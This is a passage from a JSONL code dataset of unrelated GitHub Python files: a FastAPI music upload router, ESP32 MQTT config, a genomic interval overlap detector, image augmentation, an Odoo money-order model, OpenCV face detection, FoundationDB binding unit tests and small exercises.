operation_info_offset + _LEN_OPERAND_ID\n ],\n 16)\n operation_info_offset += _LEN_OPERAND_ID\n\n # parse operand instruction\n instruction = int(self.__raw_server_data[\n operation_info_offset:\n operation_info_offset + _LEN_OPERAND_INSTRUCTION\n ],\n 16)\n operation_info_offset += _LEN_OPERAND_INSTRUCTION\n\n self.__operation_info.append((opr_type, opr_id, instruction))\n\n \" Get the next operand information \"\n def next_operand_info(self):\n self.__opr_ctr += 1\n if self.__opr_ctr < self.__no_opr:\n return self.__operation_info[self.__opr_ctr]\n return None\n\n def has_next(self):\n return self.__opr_ctr < (self.__no_opr - 1)\n\n \" Reset everything counter \"\n def reset(self):\n self.__opr_ctr = -1\n","repo_name":"Redcof/IOTPSlave","sub_path":"IOTPSlaveCore/IOTPTransactionTypeCommand.py","file_name":"IOTPTransactionTypeCommand.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11899931805","text":"from fastapi import APIRouter, File, UploadFile\nfrom common import Injects\nfrom services.music import MusicService\nfrom starlette.responses import StreamingResponse\nimport io\nimport numpy as np\n\ndef remove(data, model_name=\"u2net\"):\n model = model_u2net\n\n if model == \"u2netp\":\n model = model_u2netp\n\n img = Image.open(io.BytesIO(data))\n roi = detect.predict(model, np.array(img))\n roi = roi.resize((img.size), resample=Image.LANCZOS)\n\n empty = Image.new(\"RGBA\", (img.size), 0)\n out = Image.composite(img, empty, roi.convert(\"L\"))\n\n bio = io.BytesIO()\n out.save(bio, \"PNG\")\n\n return bio.getbuffer()\n\n\n\nrouter = APIRouter()\n\n@router.get(\"/api/music\")\nasync def root(music_service: MusicService = Injects(MusicService)):\n return {\"message\": image_service.process()}\n\n\n@router.post(\"/api/files\")\nasync def create_file(file: bytes = File(...)):\n return {\"file_size\": len(file)}\n\n\n@router.post(\"/api/music/{file_name}\")\nasync def create_upload_file(file_name, file: UploadFile = File(...), music_service: MusicService = Injects(MusicService)):\n print(file)\n print(file_name)\n print(file.filename)\n file_data=await file.read()\n file_processed=music_service.process(file_data)\n #with open('/tmp/tmp_fbc6ony.zip','rb') as f:\n # file_processed=f.read()\n return StreamingResponse(io.BytesIO(file_processed), media_type=\"application/x-zip-compressed\")\n","repo_name":"qooba/aimusicseparation","sub_path":"src/app/routers/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10133720854","text":"from machine import Pin\n\n# MQTT broker IP\nMQTT_SERVER = '10.0.1.250'\n#MQTT_SERVER = '192.168.1.143'\n\n# MQTT client config\nMQTT_CLIENT_ID = 'Weather_TV1'\nMQTT_TOPIC = 'sensornet/env/+/status'\nMQTT_TOPIC_PREFIX = 'sensornet/' + MQTT_CLIENT_ID + '/'\n\nKEY1 = Pin(35)\n\nN_LED = 0\n\nPWR_ON = 2\nOLED_PWR = 33\nTOUCH=15\nTOUCH_PWR=32\nBATT_LVL=34\n\nBAUD=27000000\nSCK=18\nMOSI=23\nMISO=32\nDC=19\nRST=4\nCS=5\n\nDISPLAY_WIDTH=128\nDISPLAY_HEIGHT=64\n\nSTYLE=1\nLANG='sv'","repo_name":"edwios/dotIoT","sub_path":"ESP32_LilyGo/WeatherInfoTV/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18950962424","text":"a = input(\"Number1: \")\r\nb = input(\"Number2: \")\r\n\r\ndef add():\r\n result1 = int(a) + int(b)\r\n return result1\r\n\r\ndef sub():\r\n result2 = int(a) - int(b)\r\n return result2\r\n\r\ndef mul():\r\n result3 = int(a) * int(b)\r\n return result3\r\n\r\ndef div():\r\n result4 = int(a) / int(b)\r\n return result4\r\n\r\nvar1 = add()\r\nvar2 = sub()\r\nvar3 = mul()\r\nvar4 = div()\r\n\r\nprint(\"Adddition=\",var1)\r\nprint(\"Subtraction=\",var2)\r\nprint(\"Multiplication=\",var3)\r\nprint(\"Division=\",var4)","repo_name":"Nilven17/Python","sub_path":"Funtion with return.py","file_name":"Funtion with return.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29599332801","text":"\"\"\"\nUtility Classes for Querying Overlaps with Genomic Regions\n----------------------------------------------------------\n\nExamples of Detecting Overlaps\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. code-block:: python\n\n >>> from pybedlite.overlap_detector import Interval, OverlapDetector\n >>> detector = OverlapDetector()\n >>> query = Interval(\"chr1\", 2, 20)\n >>> detector.overlaps_any(query)\n False\n >>> detector.add(Interval(\"chr2\", 1, 100))\n >>> detector.add(Interval(\"chr1\", 21, 100))\n >>> detector.overlaps_any(query)\n False\n >>> detector.add(Interval(\"chr1\", 1, 1))\n >>> detector.overlaps_any(query)\n True\n >>> detector.get_overlaps(query)\n [Interval(\"chr1\", 1, 1)]\n >>> detector.add(Interval(\"chr1\", 3, 10))\n >>> detector.overlaps_any(query)\n True\n >>> detector.get_overlaps(query)\n [Interval(\"chr1\", 1, 1), interval(\"chr1\", 3, 10)]\n\nModule Contents\n~~~~~~~~~~~~~~~\n\nThe module contains the following public classes:\n\n - :class:`~pybedlite.overlap_detector.Interval` -- Represents a region mapping to the genome\n that is 0-based and open-ended\n - :class:`~pybedlite.overlap_detector.OverlapDetector` -- Detects and returns overlaps between\n a set of genomic regions and another genomic region\n\"\"\"\n\nimport itertools\nfrom pathlib import Path\nfrom typing import Dict\nfrom typing import Iterable\nfrom typing import Iterator\nfrom typing import List\nfrom typing import Optional\nfrom typing import Set\n\nimport attr\nimport cgranges as cr\n\nfrom pybedlite.bed_record import BedStrand\nfrom pybedlite.bed_source import BedSource\n\n\n@attr.s(frozen=True, auto_attribs=True)\nclass Interval:\n \"\"\"A region mapping to the genome that is 0-based and open-ended\n\n Attributes:\n refname (str): the refname (or chromosome)\n start (int): the 0-based start position\n end (int): the 0-based end position (exclusive)\n negative (bool): true if the interval is on the negative strand, false otherwise\n name (Optional[str]): an optional name assigned to the interval\n \"\"\"\n\n refname: str = attr.ib()\n start: int = attr.ib()\n end: int = attr.ib()\n negative: bool = False\n name: Optional[str] = None\n\n def __attrs_post_init__(self) -> None:\n \"\"\"Performs simple validation.\n\n Checks:\n - 0 <= start\n - start < end\n \"\"\"\n if self.start < 0:\n raise ValueError(f\"start is out of range: {self.start}\")\n if self.end <= self.start:\n raise ValueError(f\"end <= start: {self.end} <= {self.start}\")\n\n def overlap(self, other: \"Interval\") -> int:\n \"\"\"Returns the overlap between this interval and the other, or zero if there is none.\n\n Args:\n other (Interval): the other interval to find the overlap with\n \"\"\"\n if self.refname != other.refname:\n return 0\n\n overlap = min(self.end, other.end) - max(self.start, other.start)\n return overlap if overlap > 0 else 0\n\n def length(self) -> int:\n \"\"\"Returns the length of the interval.\"\"\"\n return self.end - self.start\n\n\nclass OverlapDetector(Iterable[Interval]):\n \"\"\"Detects and returns overlaps between a set of genomic regions and another genomic region.\n\n Since :class:`~samwell.overlap_detector.Interval` objects are used both to populate the\n overlap detector and to query it, the coordinate system in use is also 0-based open-ended.\n\n The same interval may be added multiple times, but only a single instance will be returned\n when querying for overlaps. Intervals with the same coordinates but different names are\n treated as different intervals.\n\n This detector is the most efficient when all intervals are added ahead of time.\n \"\"\"\n\n def __init__(self) -> None:\n # A mapping from the contig/chromosome name to the associated interval tree\n self._refname_to_tree: Dict[str, cr.cgranges] = {} # type: ignore\n self._refname_to_indexed: Dict[str, bool] = {}\n self._refname_to_intervals: Dict[str, List[Interval]] = {}\n\n def __iter__(self) -> Iterator[Interval]:\n \"\"\"Iterates over the intervals in the overlap detector.\"\"\"\n return itertools.chain(*self._refname_to_intervals.values())\n\n def add(self, interval: Interval) -> None:\n \"\"\"Adds an interval to this detector.\n\n Args:\n interval: the interval to add to this detector\n \"\"\"\n refname = interval.refname\n if refname not in self._refname_to_tree:\n self._refname_to_tree[refname] = cr.cgranges() # type: ignore\n self._refname_to_indexed[refname] = False\n self._refname_to_intervals[refname] = []\n\n # Append the interval to the list of intervals for this tree, keeping the index\n # of where it was inserted\n interval_idx: int = len(self._refname_to_intervals[refname])\n self._refname_to_intervals[refname].append(interval)\n\n # Add the interval to the tree\n tree = self._refname_to_tree[refname]\n tree.add(interval.refname, interval.start, interval.end, interval_idx)\n\n # Flag this tree as needing to be indexed after adding a new interval, but defer\n # indexing\n self._refname_to_indexed[refname] = False\n\n def add_all(self, intervals: Iterable[Interval]) -> None:\n \"\"\"Adds one or more intervals to this detector.\n\n Args:\n intervals: the intervals to add to this detector\n \"\"\"\n for interval in intervals:\n self.add(interval)\n\n def overlaps_any(self, interval: Interval) -> bool:\n \"\"\"Determines whether the given interval overlaps any interval in this detector.\n\n Args:\n interval: the interval to check\n\n Returns:\n True if and only if the given interval overlaps with any interval in this\n detector.\n \"\"\"\n tree = self._refname_to_tree.get(interval.refname)\n if tree is None:\n return False\n else:\n if not self._refname_to_indexed[interval.refname]:\n tree.index()\n try:\n next(iter(tree.overlap(interval.refname, interval.start, interval.end)))\n except StopIteration:\n return False\n else:\n return True\n\n def get_overlaps(self, interval: Interval) -> List[Interval]:\n \"\"\"Returns any intervals in this detector that overlap the given interval.\n\n Args:\n interval: the interval to check\n\n Returns:\n The list of intervals in this detector that overlap the given interval, or the empty\n list if no overlaps exist. The intervals will be return in ascending genomic order.\n \"\"\"\n tree = self._refname_to_tree.get(interval.refname)\n if tree is None:\n return []\n else:\n if not self._refname_to_indexed[interval.refname]:\n tree.index()\n ref_intervals: List[Interval] = self._refname_to_intervals[interval.refname]\n # NB: only return unique instances of intervals\n intervals: Set[Interval] = {\n ref_intervals[index]\n for _, _, index in tree.overlap(interval.refname, interval.start, interval.end)\n }\n return sorted(\n intervals, key=lambda intv: (intv.start, intv.end, intv.negative, intv.name)\n )\n\n def get_enclosing_intervals(self, interval: Interval) -> List[Interval]:\n \"\"\"Returns the set of intervals in this detector that wholly enclose the query interval.\n i.e. query.start >= target.start and query.end <= target.end.\n\n Args:\n interval: the query interval\n Returns:\n The list of intervals in this detector that enclose the query interval.\n The intervals will be returned in ascending genomic order.\n \"\"\"\n results = self.get_overlaps(interval)\n return [i for i in results if interval.start >= i.start and interval.end <= i.end]\n\n def get_enclosed(self, interval: Interval) -> List[Interval]:\n \"\"\"Returns the set of intervals in this detector that are enclosed by the query\n interval. I.e. target.start >= query.start and target.end <= query.end.\n\n Args:\n interval: the query interval\n\n Returns:\n The list of intervals in this detector that are enclosed within the query interval.\n The intervals will be return in ascending genomic order.\n \"\"\"\n results = self.get_overlaps(interval)\n return [i for i in results if i.start >= interval.start and i.end <= interval.end]\n\n @classmethod\n def from_bed(cls, path: Path) -> \"OverlapDetector\":\n \"\"\"Builds an :class:`~samwell.overlap_detector.OverlapDetector` from a BED file.\n Args:\n path: the path to the BED file\n Returns:\n An overlap detector for the regions in the BED file.\n \"\"\"\n detector = OverlapDetector()\n for region in BedSource(path):\n locatable = Interval(\n refname=region.chrom,\n start=region.start,\n end=region.end,\n negative=region.strand == BedStrand.Negative,\n name=region.name,\n )\n detector.add(locatable)\n return detector\n","repo_name":"fulcrumgenomics/pybedlite","sub_path":"pybedlite/overlap_detector.py","file_name":"overlap_detector.py","file_ext":"py","file_size_in_byte":9413,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"51"} +{"seq_id":"30295136389","text":"import os\nimport cv2\nimport numpy as np\n\ndef augment_images(input_folder, output_folder):\n\n os.makedirs(output_folder, exist_ok=True)\n\n for picName in os.listdir(input_folder):\n if not picName.endswith('.jpg'):\n continue \n\n pic_dir = os.path.join(input_folder, picName)\n pic = cv2.imread(pic_dir)\n\n augmentedPics = []\n\n #Brightness\n augmentedPics.append(cv2.convertScaleAbs(pic, alpha=1.2, beta=10)) #Brightness +\n augmentedPics.append(cv2.convertScaleAbs(pic, alpha=0.8, beta=10)) #Brightness -\n\n #Saturation\n hsv_image = cv2.cvtColor(pic, cv2.COLOR_BGR2HSV)\n hsv_image[:, :, 1] = np.clip(hsv_image[:, :, 1] * 1.5, 0, 255) #Sat+\n hsv_image[:, :, 2] = np.clip(hsv_image[:, :, 2] * 0.7, 0, 255) #Sat-\n augmentedPics.append(cv2.cvtColor(hsv_image, cv2.COLOR_HSV2BGR))\n\n #Zoom\n height, width = pic.shape[:2]\n ZoomRation = 0.8\n Zoomed = cv2.resize(pic, (int(width * ZoomRation), int(height * ZoomRation)))\n augmentedPics.append(Zoomed)\n\n #Save pic\n name = os.path.splitext(picName)[0]\n for i, augmented in enumerate(augmentedPics):\n picName = f\"{name}_augmented_{i+1}.jpg\"\n picOut_dir = os.path.join(output_folder, picName)\n cv2.imwrite(picOut_dir, augmented)\n\n print(f\"Save za {picName}\")\n\n\n\n#augment_images(\"Data-validation/Up\", \"Augmented-validation/Up\")\n#augment_images(\"Data-validation/Left\", \"Augmented-validation/Left\")\n#augment_images(\"Data-validation/Right\", \"Augmented-validation/Right\")\naugment_images(\"Data-validation/Novo\", \"Augmented-validation/NovoRight\")\n","repo_name":"David-Sajina/NMDU","sub_path":"augmentation.py","file_name":"augmentation.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40478992190","text":"from openerp.exceptions import except_orm\nfrom openerp import fields, models, api\n\nclass other_money_order(models.Model):\n _name = 'other.money.order'\n _description = u'其他收入/其他支出'\n\n TYPE_SELECTION = [\n ('other_pay', u'其他收入'),\n ('other_get', u'其他支出'),\n ]\n\n @api.model\n def create(self, values):\n # 创建单据时,更新订单类型的不同,生成不同的单据编号\n if self._context.get('type') == 'other_get':\n values.update({'name': self.env['ir.sequence'].get('other.get.order') or '/'})\n if self._context.get('type') == 'other_pay' or values.get('name', '/') == '/':\n values.update({'name': self.env['ir.sequence'].get('other.pay.order') or '/'})\n\n return super(other_money_order, self).create(values)\n\n @api.one\n @api.depends('line_ids.amount')\n def _compute_total_amount(self):\n # 计算应付金额/应收金额\n self.total_amount = sum(line.amount for line in self.line_ids)\n\n state = fields.Selection([\n ('draft', u'未审核'),\n ('done', u'已审核'),\n ], string=u'状态', readonly=True, default='draft', copy=False)\n partner_id = fields.Many2one('partner', string=u'往来单位', readonly=True, states={'draft': [('readonly', False)]})\n date = fields.Date(string=u'单据日期', default=lambda self: fields.Date.context_today(self), readonly=True, states={'draft': [('readonly', False)]})\n name = fields.Char(string=u'单据编号', copy=False, readonly=True, default='/')\n total_amount = fields.Float(string=u'金额', compute='_compute_total_amount', store=True, readonly=True)\n bank_id = fields.Many2one('bank.account', string=u'结算账户',required=True, readonly=True, states={'draft': [('readonly', False)]})\n line_ids = fields.One2many('other.money.order.line', 'other_money_id', string=u'收支单行', readonly=True, states={'draft': [('readonly', False)]})\n type = fields.Selection(TYPE_SELECTION, string=u'类型', default=lambda self: self._context.get('type'), readonly=True, states={'draft': [('readonly', False)]})\n\n @api.onchange('partner_id')\n def _onchange_partner(self):\n '''\n 根据所选业务伙伴源单填充行\n '''\n self.line_ids = []\n lines = []\n for invoice in self.env['money.invoice'].search([('partner_id','=',self.partner_id.id),('to_reconcile','>',0)]):\n lines.append((0,0,{\n 'category_id':invoice.category_id.id,\n 'source_id':invoice.id,\n 'amount':invoice.to_reconcile,\n }))\n self.line_ids = lines\n\n @api.multi\n def other_money_done(self):\n '''其他收支单的审核按钮'''\n for other in self:\n if other.total_amount <= 0:\n raise except_orm(u'错误', u'金额应该大于0')\n for line in other.line_ids:\n # 针对源单付款,则更新源单和供应商应付\n if line.source_id:\n if line.amount > line.source_id.to_reconcile:\n raise except_orm(u'错误', u'核销金额大于源单未核销金额')\n else:\n line.source_id.to_reconcile -= line.amount\n other.partner_id.payable -= line.amount\n # 根据单据类型更新账户余额\n if other.type == 'other_pay':\n other.bank_id.balance -= other.total_amount\n else:\n other.bank_id.balance += other.total_amount\n other.state = 'done'\n return True\n\n @api.multi\n def other_money_draft(self):\n '''其他收支单的反审核按钮'''\n for other in self:\n for line in other.line_ids:\n # 针对源单付款,则更新源单和供应商应付\n if line.source_id:\n line.source_id.to_reconcile += line.amount\n other.partner_id.payable += line.amount\n # 根据单据类型更新账户余额\n if other.type == 'other_pay':\n other.bank_id.balance += other.total_amount\n else:\n other.bank_id.balance -= other.total_amount\n other.state = 'draft'\n return True\n\n @api.multi\n def print_other_money_order(self):\n '''打印 其他收入/支出单'''\n assert len(self._ids) == 1, '一次执行只能有一个id'\n return self.env['report'].get_action('money.report_other_money_order')\n\nclass other_money_order_line(models.Model):\n _name = 'other.money.order.line'\n _description = u'其他收支单明细'\n\n other_money_id = fields.Many2one('other.money.order', string=u'其他收支')\n category_id = fields.Many2one('core.category', u'类别', domain=\"[('type', '=', context.get('type'))]\")\n source_id = fields.Many2one('money.invoice', string=u'源单')\n amount = fields.Float(string=u'金额')\n note = fields.Char(string=u'备注')\n","repo_name":"USI-SHRD/gooderp","sub_path":"addons/money/other_money_order.py","file_name":"other_money_order.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"51"} +{"seq_id":"17673597216","text":"import numpy as np\nimport cv2\n\nvid = cv2.VideoCapture(0)\nfaceCascade = cv2.CascadeClassifier('C:\\\\OpenCV\\\\OpenCV4.6.0G\\\\data\\\\haarcascades\\\\haarcascade_frontalface_default.xml')\neyeCascade = cv2.CascadeClassifier('C:\\\\OpenCV\\\\OpenCV4.6.0G\\\\data\\\\haarcascades\\\\haarcascade_eye.xml')\nmouthCascade = cv2.CascadeClassifier('C:\\\\OpenCV\\\\OpenCV4.6.0G\\\\data\\\\haarcascades\\\\haarcascade_smile.xml')\n\nwhile True:\n ret, frame = vid.read()\n faces = faceCascade.detectMultiScale(frame, scaleFactor=1.05, minNeighbors=5, minSize=(30,30), flags=cv2.CASCADE_SCALE_IMAGE)\n # Draw just the face\n if len(faces) > 0:\n x, y, w, h = faces[0]\n frame = frame[y:y+h, x:x+w]\n # Resize to original size\n frame = cv2.resize(frame, (640, 480))\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\nvid.release()\ncv2.destroyAllWindows()","repo_name":"artuppp/PythonOpenCVClassifiers","sub_path":"tiktok.py","file_name":"tiktok.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"69880658079","text":"import argparse\nimport os\nimport sys\nimport time\nimport traceback\nimport json\n\nimport fdb\n\nif __name__ == \"__main__\":\n fdb.api_version(fdb.LATEST_API_VERSION)\n\nfrom cancellation_timeout_tests import test_timeouts\nfrom cancellation_timeout_tests import test_db_timeouts\nfrom cancellation_timeout_tests import test_cancellation\nfrom cancellation_timeout_tests import test_retry_limits\nfrom cancellation_timeout_tests import test_db_retry_limits\nfrom cancellation_timeout_tests import test_combinations\n\nfrom size_limit_tests import test_size_limit_option, test_get_approximate_size\nfrom tenant_tests import test_tenants\n\nVERBOSE = False\n\n\ndef log(msg):\n if VERBOSE:\n print(msg, file=sys.stderr, flush=True)\n\n\ndef test_fdb_transactional_generator(db):\n try:\n\n @fdb.transactional\n def function_that_yields(tr):\n yield 0\n\n assert (\n fdb.get_api_version() < 630\n ), \"Pre-6.3, a decorator may wrap a function that yields\"\n except ValueError:\n assert (\n fdb.get_api_version() >= 630\n ), \"Post-6.3, a decorator should throw if wrapped function yields\"\n\n\ndef test_fdb_transactional_returns_generator(db):\n try:\n\n def function_that_yields(tr):\n yield 0\n\n @fdb.transactional\n def function_that_returns(tr):\n return function_that_yields(tr)\n\n function_that_returns()\n assert fdb.get_api_version() < 630, \"Pre-6.3, returning a generator is allowed\"\n except ValueError:\n assert (\n fdb.get_api_version() >= 630\n ), \"Post-6.3, returning a generator should throw\"\n\n\ndef test_db_options(db):\n db.options.set_location_cache_size(100001)\n db.options.set_max_watches(100001)\n db.options.set_datacenter_id(\"dc_id\")\n db.options.set_machine_id(\"machine_id\")\n db.options.set_snapshot_ryw_enable()\n db.options.set_snapshot_ryw_disable()\n db.options.set_transaction_logging_max_field_length(1000)\n db.options.set_transaction_timeout(100000)\n db.options.set_transaction_timeout(0)\n db.options.set_transaction_timeout(0)\n db.options.set_transaction_max_retry_delay(100)\n db.options.set_transaction_size_limit(100000)\n db.options.set_transaction_retry_limit(10)\n db.options.set_transaction_retry_limit(-1)\n db.options.set_transaction_causal_read_risky()\n db.options.set_transaction_include_port_in_address()\n\n\n@fdb.transactional\ndef test_options(tr):\n tr.options.set_priority_system_immediate()\n tr.options.set_priority_batch()\n tr.options.set_causal_read_risky()\n tr.options.set_causal_write_risky()\n tr.options.set_read_your_writes_disable()\n tr.options.set_read_system_keys()\n tr.options.set_access_system_keys()\n tr.options.set_transaction_logging_max_field_length(1000)\n tr.options.set_timeout(60 * 1000)\n tr.options.set_retry_limit(50)\n tr.options.set_max_retry_delay(100)\n tr.options.set_used_during_commit_protection_disable()\n tr.options.set_debug_transaction_identifier(\"my_transaction\")\n tr.options.set_log_transaction()\n tr.options.set_read_lock_aware()\n tr.options.set_lock_aware()\n tr.options.set_include_port_in_address()\n tr.get(b\"\\xff\").wait()\n\n\ndef check_watches(db, watches, expected):\n for i, watch in enumerate(watches):\n if watch.is_ready() or expected:\n try:\n watch.wait()\n if not expected:\n assert False, \"Watch %d is ready\" % i\n except fdb.FDBError as e:\n tr = db.create_transaction()\n tr.on_error(e).wait()\n return False\n\n return True\n\n\ndef test_watches(db):\n while True:\n db[b\"w0\"] = b\"0\"\n db[b\"w3\"] = b\"3\"\n\n watches = [None]\n\n @fdb.transactional\n def txn1(tr):\n watches[0] = tr.watch(b\"w0\")\n tr.set(b\"w0\", b\"0\")\n assert not watches[0].is_ready()\n\n txn1(db)\n\n watches.append(db.clear_and_watch(b\"w1\"))\n watches.append(db.set_and_watch(b\"w2\", b\"2\"))\n watches.append(db.get_and_watch(b\"w3\"))\n\n assert watches[3][0] == b\"3\"\n watches[3] = watches[3][1]\n\n time.sleep(1)\n\n if not check_watches(db, watches, False):\n continue\n\n del db[b\"w1\"]\n\n time.sleep(5)\n\n if not check_watches(db, watches, False):\n continue\n\n db[b\"w0\"] = b\"a\"\n db[b\"w1\"] = b\"b\"\n del db[b\"w2\"]\n db.bit_xor(b\"w3\", b\"\\xff\\xff\")\n\n if check_watches(db, watches, True):\n return\n\n\n@fdb.transactional\ndef test_locality(tr):\n tr.options.set_timeout(60 * 1000)\n tr.options.set_read_system_keys() # We do this because the last shard (for now, someday the last N shards) is in the /FF/ keyspace\n\n # This isn't strictly transactional, thought we expect it to be given the size of our database\n boundary_keys = list(fdb.locality.get_boundary_keys(tr, b\"\", b\"\\xff\\xff\")) + [\n b\"\\xff\\xff\"\n ]\n end_keys = [\n tr.get_key(fdb.KeySelector.last_less_than(k)) for k in boundary_keys[1:]\n ]\n\n start_addresses = [\n fdb.locality.get_addresses_for_key(tr, k) for k in boundary_keys[:-1]\n ]\n end_addresses = [fdb.locality.get_addresses_for_key(tr, k) for k in end_keys]\n\n if [set(s.wait()) for s in start_addresses] != [\n set(e.wait()) for e in end_addresses\n ]:\n raise Exception(\"Locality not internally consistent.\")\n\n\ndef test_predicates():\n assert fdb.predicates.is_retryable(fdb.FDBError(1020))\n assert not fdb.predicates.is_retryable(fdb.FDBError(10))\n\n\ndef test_get_client_status(db):\n @fdb.transactional\n def simple_txn(tr):\n tr.get_read_version().wait()\n\n # Execute a simple transaction\n # to make sure the database is initialized\n simple_txn(db)\n # Here we just check if a meaningful client report status is returned\n # Different report attributes and error cases are covered by C API tests\n status_str = db.get_client_status().wait()\n status = json.loads(status_str)\n assert \"Healthy\" in status\n assert status[\"Healthy\"]\n\n\ndef run_unit_tests(db):\n try:\n log(\"test_db_options\")\n test_db_options(db)\n log(\"test_options\")\n test_options(db)\n log(\"test_watches\")\n test_watches(db)\n log(\"test_cancellation\")\n test_cancellation(db)\n log(\"test_retry_limits\")\n test_retry_limits(db)\n log(\"test_db_retry_limits\")\n test_db_retry_limits(db)\n log(\"test_timeouts\")\n test_timeouts(db)\n log(\"test_db_timeouts\")\n test_db_timeouts(db)\n log(\"test_combinations\")\n test_combinations(db)\n log(\"test_locality\")\n test_locality(db)\n log(\"test_predicates\")\n test_predicates()\n log(\"test_size_limit_option\")\n test_size_limit_option(db)\n log(\"test_get_approximate_size\")\n test_get_approximate_size(db)\n log(\"test_get_client_status\")\n test_get_client_status(db)\n\n if fdb.get_api_version() >= 710:\n log(\"test_tenants\")\n test_tenants(db)\n\n except fdb.FDBError as e:\n print(\"Unit tests failed: %s\" % e.description)\n traceback.print_exc()\n\n raise Exception(\"Unit tests failed: %s\" % e.description)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\n Unit tests for python FDB API.\n \"\"\",\n )\n parser.add_argument(\n \"--cluster-file\",\n \"-C\",\n help=\"FDB cluster file\",\n required=True,\n )\n parser.add_argument(\n \"--verbose\",\n \"-V\",\n help=\"Print diagnostic info\",\n action=\"store_true\",\n )\n args = parser.parse_args()\n if args.verbose:\n VERBOSE = True\n log(\"Opening database {}\".format(args.cluster_file))\n db = fdb.open(args.cluster_file)\n run_unit_tests(db)\n","repo_name":"apple/foundationdb","sub_path":"bindings/python/tests/unit_tests.py","file_name":"unit_tests.py","file_ext":"py","file_size_in_byte":7970,"program_lang":"python","lang":"en","doc_type":"code","stars":13381,"dataset":"github-code","pt":"51"} +{"seq_id":"19004116945","text":"class Codec:\n def encode(self, strs: [str]) -> str:\n \"\"\"Encodes a list of strings to a single string.\n \"\"\"\n string = \"\"\n for s in strs:\n s = s.replace(\"#\", \"##\")\n string += f\"{s} # \"\n return string\n\n def decode(self, s: str) -> [str]:\n \"\"\"Decodes a single string to a list of strings.\n \"\"\"\n strs = s.split(\" # \")\n for i in range(len(strs)):\n strs[i] = strs[i].replace(\"##\", \"#\")\n return strs[:-1]\n\n\n# Your Codec object will be instantiated and called as such:\n# codec = Codec()\n# codec.decode(codec.encode(strs))\n","repo_name":"Yong-Zhuang/Tutoring","sub_path":"Interview/Coding/String/encode-and-decode-strings.py","file_name":"encode-and-decode-strings.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73128990557","text":"class Stack:\n\n def __init__(self):\n self.st = [] \n self.tos = 0 \n\n def Push(self,x:int):\n self.tos += 1\n self.st.append(x)\n\n def Top(self):\n return self.st[self.tos-1]\n\n def Empty(self):\n if self.tos == 0:\n return 1 \n else:\n return 0 \n\n def Pop(self):\n if self.Empty == 1:\n return \"uderflow\"\n else:\n x = self.st.pop(self.tos-1)\n self.tos -= 1 \n return x\n\ndef main():\n stack = Stack() \n stack.Push(10)\n stack.Push(20) \n stack.Push(30)\n print(stack.Pop())\n print(stack.Top()) \n print(stack.Empty())\n print(stack.st)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"glunkad/Programming-and-Data-Structures","sub_path":"stack/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22587573498","text":"from torchvision import transforms\nimport torch\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nfrom data import mean, std, device, get_gram, get_image, denormalize_img\nfrom model import FeatureExtractor\n\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nimg_transform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize(mean=mean, std=std)])\n\nstyle_img = get_image('style.jpeg', img_transform)\ncontent_img = get_image('content.png', img_transform)\n\n#generated_img = nn.Parameter(torch.FloatTensor(content_img.size()))\ngenerated_img = content_img.clone()\ngenerated_img.requires_grad = True\n\n\n#train\noptimizer = torch.optim.Adam([generated_img], lr=0.003, betas=[0.5, 0.999])\nencoder = FeatureExtractor().to(device)\nencoder.eval()\n\ncontent_weight = 1\nstyle_weight = 100\n\nfor epoch in range(1):\n content_features = encoder(content_img)\n style_features = encoder(style_img)\n generated_features = encoder(generated_img)\n\n loss = nn.MSELoss()\n #content_loss = torch.mean((content_features[-1] - generated_features[-1])**2)\n content_loss = loss(content_features[-1], generated_features[-1])\n\n style_loss = 0\n\n for style_feature, generated_feature in zip(style_features, generated_features):\n gram_style = get_gram(style_feature)\n gram_generated = get_gram(generated_feature)\n\n style_loss += loss(gram_style, gram_generated)\n\n total_loss = style_weight * style_loss + content_weight * content_loss\n\n optimizer.zero_grad()\n total_loss.backward()\n optimizer.step()\n\n if epoch % 100 == 0:\n print(\"Epoch {} \\t content_loss: {:.5f}\\t style_loss: {:0.5f}\".format(epoch, content_loss.item(), style_loss.item()))\n\n\nresult = generated_img.squeeze().detach().cpu()\nresult = denormalize_img(result)\nprint(result.shape)\nimg = result * 255\nimg = img.astype(np.uint8)\nimg = Image.fromarray(img)\nimg.save('result.jpg')\nplt.imshow(result)\nplt.show()\n","repo_name":"badranX/neural_style_transfer","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17801361332","text":"import tensorflow as tf\nimport numpy as np\nfrom sklearn.preprocessing import minmax_scale\n#from sklearn.preprocessing import MinMaxScaler\n\n# many to one (과거 6일의 데이터를 기반으로 7일째의 데이터를 예측)\n\ntimesteps = seq_length 